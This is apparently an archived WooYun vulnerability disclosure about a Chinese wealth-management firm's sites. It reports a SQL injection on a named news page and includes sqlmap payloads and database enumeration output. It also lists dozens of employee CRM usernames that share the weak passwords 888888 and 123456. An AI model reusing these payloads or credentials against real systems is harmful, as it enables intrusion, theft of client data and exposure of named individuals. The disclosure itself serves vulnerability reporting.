乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-13: 细节已通知厂商并且等待厂商处理中 2015-08-14: 厂商已经确认,细节仅向厂商公开 2015-08-24: 细节向核心白帽子及相关领域专家公开 2015-09-03: 细节向普通白帽子公开 2015-09-13: 细节向实习白帽子公开 2015-09-28: 细节向公众公开
新湖财富投资公司2平台漏洞可泄漏大量客户理财数据/大量员工密码泄露(个人信息、理财产品等)
http://www.xinhucaifu.com/news.php?id=198 主站是个参数就能注入
[10:33:39] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectableGET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] nsqlmap identified the following injection points with a total of 48 HTTP(s) requests:---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=198) AND 8832=8832 AND (1107=1107 Type: UNION query Title: MySQL UNION query (NULL) - 8 columns Payload: id=-7240) UNION ALL SELECT NULL,CONCAT(0x7167716871,0x4a4c7156656a41495666,0x716b676371),NULL,NULL,NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=198) AND SLEEP(5) AND (9760=9760---[10:33:49] [INFO] the back-end DBMS is MySQLweb server operating system: Windowsweb application technology: Apache 2.2.22back-end DBMS: MySQL 5.0.11[10:33:49] [INFO] fetching database names[10:33:50] [INFO] the SQL query used returns 2 entries[10:33:50] [INFO] retrieved: "information_schema"[10:33:50] [INFO] retrieved: "xinhucaifu"available databases [2]: [*] information_schema[*] xinhucaifu
http://crm.xinhucaifu.com/login.jspcrm大量弱口令
密码:888888zhoudapengsunhongyuzhangfanhudielilimeizhanghanzhaopingwangyudaijiajiedenghaoxiangfangjianzhaohouxiaokunwangxiaomengxiaobingzhaojinyuchenghefenggexinyuhongmeizhangyingsunyitongwangweijiegaoxuefenggaominlifeifeiquningyaojingchaoliuzhengchangzhengxiaoyumaoyiyuanwangyubianjianglujunwanghaikuohoujuewangwengewangzaixiyangchangjianghujuanjuanzhanghaifengweizizhuyuelintaoliyanpingzhaohaifengliangxitongquyuncaicaojingjiangyuyiyuyichengwangjifengfusilixieminzhangaiqingmengxiangyangshengdaweirentianxiangwangzhijianchengwanlanglinlinmameixiuzhangtingtingzhoufengmishanyuxiaotinglishidongliufengjuancuihaixiadouyoufaluoxiaojiawangjiaxinshiyafeihexunliqifangliuliyanxuguangleidailijiaocaixinyingliangxinwuliuzexinmanzhaobinsonglingruihaoxilongjianghaosongzhaosuiyandetianhongtaohuangleixiayouquanlijunpengmiaosainanchihongzhumuzhangliliyaopengleihaomingqianliusuxiangliuxiaopingmengdandaijingdongcunweiguokepulierjinlilimingliyaxunliuxiaonarenwenyanwanghuixujianliusicongwenweihuapengningchenjiananliguangweilijiayewangweifuwangxiaotingyuyanchaozhangqincuinaiqiguoyanqiangliutieqiangluohaitaoyinsujuanheleileiwangjingjingliyuefenglinxiumeiliuqianlouyuweizhanghuijiagaotongtangchunqingwanghuiwangxiaozhoulihuizhuchanghongjizhaotianruiningwuhaichaozhaoyongningzhencuixiadingxuanchenghuangxiangchengliwenlongwuyuechenjianfenglouyufengshijialeruanchunzhangqinzhangxinleitengguoshuailiuqichenqinyunluhengludingxingjunliugaoliuyukaishishientanghongxiabinliumingmingyuhongwuyinyanzhangmingyuanjiaqilingkongliuyanhualizhaoxunzhangdawei
密码:123456tangliqiufanrongshihongweipanyingbaixuehanjiangangyangbinchenjiufeiliyeliuzhanyingsujiuhongmenglei
包括但不限于以上账号 请厂商自己再排查一下
危害等级:高
漏洞Rank:12
确认时间:2015-08-14 10:48
CNVD确认所述情况,已经由CNVD通过网站公开联系方式向软件生产厂商通报。
暂无